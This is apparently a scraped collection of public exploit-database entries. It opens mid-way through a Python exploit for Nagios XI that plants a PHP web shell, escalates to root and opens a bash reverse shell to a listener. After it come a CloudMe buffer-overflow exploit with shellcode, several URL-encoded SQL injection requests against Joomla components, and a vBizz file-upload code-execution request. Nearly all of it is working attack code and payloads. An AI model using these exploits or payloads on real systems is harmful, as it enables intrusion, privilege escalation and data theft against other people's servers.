# handle sending a get request
def http_get_quiet(url):
    try:
        r = requests.get(url, timeout=TIMEOUT, verify=False)
    except requests.exceptions.ReadTimeout:
        err_and_exit("Request to '" + url + "' timed out.")
    else:
        return r

# 200?
def url_ok(url):
    r = http_get_quiet(url)
    return (r.status_code == 200)

# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
    querystr = { 'cmd' : cmd }
    # e.g. http://blah/exec.php?cmd=whoami
    url = path + '?' + urllib.urlencode(querystr)
    return http_get_quiet(url)

# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
    if remote:
        for path in paths:
            send_shell_cmd(exec_path, 'rm ' + path)
            print 'Removing remote file ' + path
    else:
        for path in paths:
            os.remove(path)
            print 'Removing local file ' + path

# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
    """Generate a SSL certificate.
 
    If the cert_path and the key_path are present they will be overwritten.
    """
    if not os.path.exists(cert_dir):
        os.makedirs(cert_dir)
    cert_path = os.path.join(cert_dir, cert_file)
    key_path = os.path.join(cert_dir, key_file)
 
    if os.path.exists(cert_path):
        os.unlink(cert_path)
    if os.path.exists(key_path):
        os.unlink(key_path)
 
    # create a key pair
    key = crypto.PKey()
    key.generate_key(crypto.TYPE_RSA, 1024)
 
    # create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().C = 'US'
    cert.get_subject().ST = 'Lorem'
    cert.get_subject().L = 'Ipsum'
    cert.get_subject().O = 'Lorem'
    cert.get_subject().OU = 'Ipsum'
    cert.get_subject().CN = 'Unknown'
    cert.set_serial_number(1000)
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) 
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(key)
    cert.sign(key, 'sha1')
 
    with open(cert_path, 'wt') as fd: 
        fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
 
    with open(key_path, 'wt') as fd: 
        fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
 
    return cert_path, key_path

# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
        self.end_headers()
        self.wfile.write(str.encode(msg))

# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
    def __init__(self, host, port, keyfile, certfile):
        self.server = SocketServer.TCPServer((host, port), MyHTTPD)
	self.server.socket = ssl.wrap_socket(
	    self.server.socket,
	    keyfile=keyfile,
	    certfile=certfile,
	    server_side=True
	)
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True

    def start(self):
        self.server_thread.start()

    def stop(self):
        self.server.shutdown()
        self.server.server_close()

##### MAIN #####

desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')

args = arg_parser.parse_args()

# Nagios XI target settings
target = { 'ip' : args.t }

# listener settings
listener = {
    'ip'    : args.ip,
    'port'  : args.port,
    'ncip'  : args.ncip,
    'ncport': args.ncport
}

# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)

# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()

print "\nListening on " + listener['ip'] + ":" + str(listener['port'])

# path to Nagios XI app
base_url = 'https://' + target['ip']

# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
    err_and_exit('magpie_debug.php not found.')

print '\nFound magpie_debug.php.\n'

exec_path = None        # path to exec.php in URL
cleanup_paths = []     # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
    ( '/usr/local/nagvis/share/', '/nagvis' ),
    ( '/var/www/html/nagiosql/', '/nagiosql' )
]

# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
    local_path = path[0] + filename # on fs
    url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path  # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
    url = magpie_url + '?url=' + url
    print 'magpie url = ' + url
    r = http_get_quiet(url)

    # ensure php file was created
    exec_url = base_url + path[1] + '/' + filename  # e.g. https://192.168.1.192/nagiosql/exec.php
    if url_ok(exec_url):
        exec_path = exec_url
        cleanup_paths.append(local_path)
        break
    # otherwise, try the next path

if exec_path is None:
    err_and_exit('Couldn\'t create PHP file.')

print '\n' + filename + ' written. Visit ' + exec_url + '\n'

# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
    ('whoami', 'Current User'),
    ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]

for cmd in cmds:
    r = send_shell_cmd(exec_url, cmd[0])
    sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)

# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
    ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
    ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]

# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
    try:
        querystr = { 'cmd' : priv_esc[0] }
        url = exec_path + '?' + urllib.urlencode(querystr)
        r = requests.get(url, timeout=TIMEOUT, verify=False)
        print '\nTrying to escalate privs with url: ' + url
    except requests.exceptions.ReadTimeout:
        timed_out = True
        if priv_esc[1] is not None:
            cleanup_paths.append(priv_esc[1])
        break

if timed_out:
    print 'Check for a shell!!\n'
else:
    print 'Not so sure it worked...\n'

server.stop()

# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])
HireHackking 
# Exploit Title:  Microsoft Windows 'VCF' or 'Contact' File URL Manipulation-Spoof Arbitrary Code Execution Vulnerability -- Remote Vector

# Google Dork: N/A

# Date: January, 21 2019

# Exploit Author:  Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019. both x86 and x64 architectures.

# Tested on: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019. both x86 and x64 architectures.

# CVE : n/a


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46220.zip
HireHackking 
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !

#############################################################

import socket

egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa" 
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

target="127.0.0.1"
junk="A"*1015			
jmp="\xd9\x37\x99\x69"  #0x699937d9 push ret
jump_back="\xeb\xc4"    #jump -60 bytes


#Shellcode calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"

payload1=junk+egg+"B"*5 + jmp + jump_back
payload2="boomboom" + buf

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(payload1+payload2)
except:
	print "Don't Crash Me !"
HireHackking 
# Exploit Title: Joomla! Component vReview 1.9.11 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/
# Version: 1.9.11
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_vreview&task=editReview
# 

POST /[PATH]/index.php?option=com_vreview&task=editReview HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Date: Tue, 22 Jan 2019 19:41:46 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

# POC: 
# 2)
# http://localhost/[PATH]/index.php?option=com_vreview&task=displayRecords
# 

POST /[PATH]/index.php?option=com_vreview&task=displayReply HTTP/1.1
POST /[PATH]/index.php?option=com_vreview&task=displayRecords HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 424
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profileid=%39%39%39%39%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2d%2d%20%2d: undefined
HTTP/1.1 500....
Date: Tue, 22 Jan 2019 19:33:39 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
# Exploit Title: Joomla! Component vWishlist 1.0.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/
# Version: 1.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]//
# 

POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

# POC: 
# 2)
# http://localhost/[PATH]//
# 

POST /[PATH]/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48: undefined
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: True
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php
# 

POST /[PATH]/index.php? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 726
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee: undefined
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4278
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:10:53 GMT
X-Varnish: 561075451
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
HireHackking 
# Exploit Title: Joomla! Component vBizz 1.0.7 - Remote Code Execution
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_vbizz&view=employee
# 

POST /[PATH]/index.php?option=com_vbizz&view=employee HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 3876
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------21301381330395: undefined
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------21301381330395
Content-Disposition: form-data; name="name"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="username"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="password"
-----------------------------21301381330395
Content-Disposition: form-data; name="user_role"
11
-----------------------------21301381330395
Content-Disposition: form-data; name="email"
test@test.test
-----------------------------21301381330395
Content-Disposition: form-data; name="empid"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="department"
5
-----------------------------21301381330395
Content-Disposition: form-data; name="designation"
6
-----------------------------21301381330395
Content-Disposition: form-data; name="phone"
-----------------------------21301381330395
Content-Disposition: form-data; name="gender"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="blood_group"
A+
-----------------------------21301381330395
Content-Disposition: form-data; name="dob"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="present_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="permanent_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="joining_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="work_type"
permanent
-----------------------------21301381330395
Content-Disposition: form-data; name="payment_type"
bank
-----------------------------21301381330395
Content-Disposition: form-data; name="pan"
-----------------------------21301381330395
Content-Disposition: form-data; name="pf_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_name"
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_branch"
-----------------------------21301381330395
Content-Disposition: form-data; name="ifsc"
-----------------------------21301381330395
Content-Disposition: form-data; name="leaving_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
111.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
8
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
9
-----------------------------21301381330395
Content-Disposition: form-data; name="lastIncrement"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="option"
com_vbizz
-----------------------------21301381330395
Content-Disposition: form-data; name="id"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="userid"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="task"

apply
-----------------------------21301381330395
Content-Disposition: form-data; name="view"
employee
-----------------------------21301381330395--
HTTP/1.1 303 See other
X-Powered-By: PHP/5.6.36
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Last-Modified: Tue, 22 Jan 2019 21:21:40 GMT
Content-Type: text/html; charset=utf-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 28854
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:40 GMT
X-Varnish: 561081442
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS

GET /components/com_vbizz/uploads/profile_pics/1548192100phpinfo.php HTTP/1.1
Host: vbizz-for-joomla.wdmtech.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.36
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 110286
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:44 GMT
X-Varnish: 561081464
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS
HireHackking 
# Exploit Title: Joomla! Component vAccount 2.0.2 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/
# Version: 2.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/vaccount-dashboard/expense?vid=[SQL]
# 

GET /[PATH]/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4216
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:33:56 GMT
X-Varnish: 561086750
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
HireHackking 
# Exploit Title: Joomla! Component J-MultipleHotelReservation 6.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
# Version: 6.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
# 

%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%74%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a%3d%30%29,%28%40%74%62%6c%3a%3d%30%78%30%30%29%2c%28%73%65%6c%45%43%74%28%30%29%66%52%4f%6d%28%69%6e%66%6f%52%4d%41%54%69%6f%6e%5f%73%63%68%45%4d%61%2e%63%6f%4c%55%4d%6e%73%29%77%48%45%72%65%28%74%41%42%4c%65%5f%73%63%68%45%4d%61%3d%64%61%54%41%42%61%73%65%28%29%29%61%4e%64%28%30%78%30%30%29%69%6e%28%40%78%3a%3d%43%6f%6e%63%61%74%28%40%78%2c%69%66%28%28%40%74%62%6c%21%3d%74%41%42%4c%65%5f%6e%61%6d%65%29%2c%43%6f%6e%63%61%74%28%4c%50%41%44%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a=%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%30%33%64%33%65%2c%40%74%42%6c%3a%3d%74%41%42%4c%65%5f%6e%61%4d%65%2c%28%40%7a%3a%3d%30%78%30%30%29%29%2c%20%30%78%30%30%29%2c%6c%70%61%64%28%40%7a%3a%3d%40%7a%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%64%33%65%2c%30%78%34%62%36%66%36%63%36%66%36%65%33%61%32%30%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%